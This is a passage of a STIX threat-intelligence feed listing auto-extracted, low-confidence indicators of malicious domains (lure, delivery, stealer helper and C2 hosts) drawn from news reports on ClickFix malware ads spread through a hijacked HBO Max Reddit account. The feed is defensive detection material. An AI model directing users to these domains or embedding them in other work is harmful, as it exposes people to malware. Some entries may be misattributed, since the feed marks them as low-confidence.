News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7abfab08-2d57-404d-924a-66f0dbe5231f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: node-slate.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]c","pattern":"[domain-name:value = 'node-slate.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b104e954-9b9a-4a79-93e3-4f2055448098","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nova-desk.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-to","pattern":"[domain-name:value = 'nova-desk.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32a26b5b-3cf3-44a3-879e-e6cae3c95531","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nova-fix.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novas","pattern":"[domain-name:value = 'nova-fix.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b995c812-0d0f-4c75-a3df-4e2261026676","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nova-hub.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: diag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;","pattern":"[domain-name:value = 'nova-hub.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b9d015d-32e7-45e6-a5d1-3be0382c2186","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nova-labs.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.","pattern":"[domain-name:value = 'nova-labs.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8206a418-a8a8-41f3-906b-2ca870b1c0f5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: novastacktips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: x[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning","pattern":"[domain-name:value = 'novastacktips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91a89864-82e0-4902-9d9b-a595fd0099a6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nova-tools.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: esk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstorageti","pattern":"[domain-name:value = 'nova-tools.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e9c84e61-cb4a-4cb9-82df-e657ca88567a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oakenfjrod.ru","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]na","pattern":"[domain-name:value = 'oakenfjrod.ru']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b114f36-0102-4801-9042-788c06ffccf4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: opendisplay.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;","pattern":"[domain-name:value = 'opendisplay.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--176f7d29-772d-413d-afbf-8eadbdfaba30","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ouilov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop","pattern":"[domain-name:value = 'ouilov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4e850234-ecf0-411e-be98-1ae7ccbcb34a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: papartybus.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sp","pattern":"[domain-name:value = 'papartybus.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52cf8e3d-9785-4826-bb14-5a7619287d60","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: perchframe15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: mains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS lo","pattern":"[domain-name:value = 'perchframe15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b412c6bb-009f-4771-a317-ca29c5b81df5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pine63.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain we","pattern":"[domain-name:value = 'pine63.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cfa90abc-631b-416b-a77f-42d20c0e7ef6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pinescope11.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: lawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.","pattern":"[domain-name:value = 'pinescope11.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c7089fb-12af-43b9-925d-c75d7a7c2265","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: press29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canv","pattern":"[domain-name:value = 'press29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3a7eabf-5a06-4295-b8eb-db6394c62be3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pressureulcerlawyer.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1","pattern":"[domain-name:value = 'pressureulcerlawyer.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd6ead36-f6c1-4630-a2bb-666494b193de","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: rectangleap.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; c","pattern":"[domain-name:value = 'rectangleap.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55c9cd80-bb30-411e-8eb8-e1f351db7937","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: remotion-skills.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: op; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains D","pattern":"[domain-name:value = 'remotion-skills.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65af0eba-6478-4514-81a7-c4f0dc27cccf","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: restoremental.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: gtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemade","pattern":"[domain-name:value = 'restoremental.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--036c6740-a308-445e-a949-11108f03129c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: rudder-moss.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domai","pattern":"[domain-name:value = 'rudder-moss.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8a0c2c0-bf03-43d0-b59c-0752bf998d94","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: sgaaagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; b","pattern":"[domain-name:value = 'sgaaagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--314a5cfe-eec3-4f3e-b9d1-b764218af7a8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: sic180.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Do","pattern":"[domain-name:value = 'sic180.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--113b5a6f-b6b2-49c9-b48c-7d336531bde2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: sprieagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]co","pattern":"[domain-name:value = 'sprieagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--98e786a6-0c56-484c-84f6-d887ec7e58b1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: storageprofiler.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: le activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contac","pattern":"[domain-name:value = 'storageprofiler.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c6b0d24-cfa9-4d6f-a042-bab3b8b6caa8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: thepullmanfolkestone.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: sioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlin","pattern":"[domain-name:value = 'thepullmanfolkestone.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cac6bb05-cd29-4f73-9f61-d921d839b586","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: trekmesh15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; e","pattern":"[domain-name:value = 'trekmesh15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d15171e-4442-4378-889d-40e40796d459","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: umapla.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop","pattern":"[domain-name:value = 'umapla.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba0f4270-d03b-44e8-9c76-0d153bcf560c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: verse-18.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com A","pattern":"[domain-name:value = 'verse-18.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a66159ad-0c66-4d6a-b7d9-afac84564dd0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: wantsellonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: osoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; s","pattern":"[domain-name:value = 'wantsellonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--db27629b-3db7-49d1-bc8f-1cb947aed836","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: weaveridge7.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com Septe","pattern":"[domain-name:value = 'weaveridge7.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--980b92c0-833b-4cfe-a3b5-52b87e48da3e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: wuess.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: n weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain hou","pattern":"[domain-name:value = 'wuess.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f075a3e5-ec18-4bc8-bce1-33fc3a7284d4","created":"2026-09-15T05:31:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: opusaccel.top","description":"Seen in \"China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE\" (The Hacker News). Context: and loop that polls a command-and-control (C2) server (\"ocr.opusaccel[.]top\") to receive further instructions that are then executed","pattern":"[domain-name:value = 'opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-15T05:31:05.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-hackers-exploit-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f2abc4a-0fea-4dcb-97a9-b339613d4fd8","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25edba2b-625d-4170-9205-c3e4706a7b83","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f3a8b3e-351d-40b7-8bd8-33e8fd23a5c6","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7628df2-3d11-4d6f-bb21-0635c8557855","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ff43ed7e-c1e9-43d7-a877-63fa667d3005","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: cted to 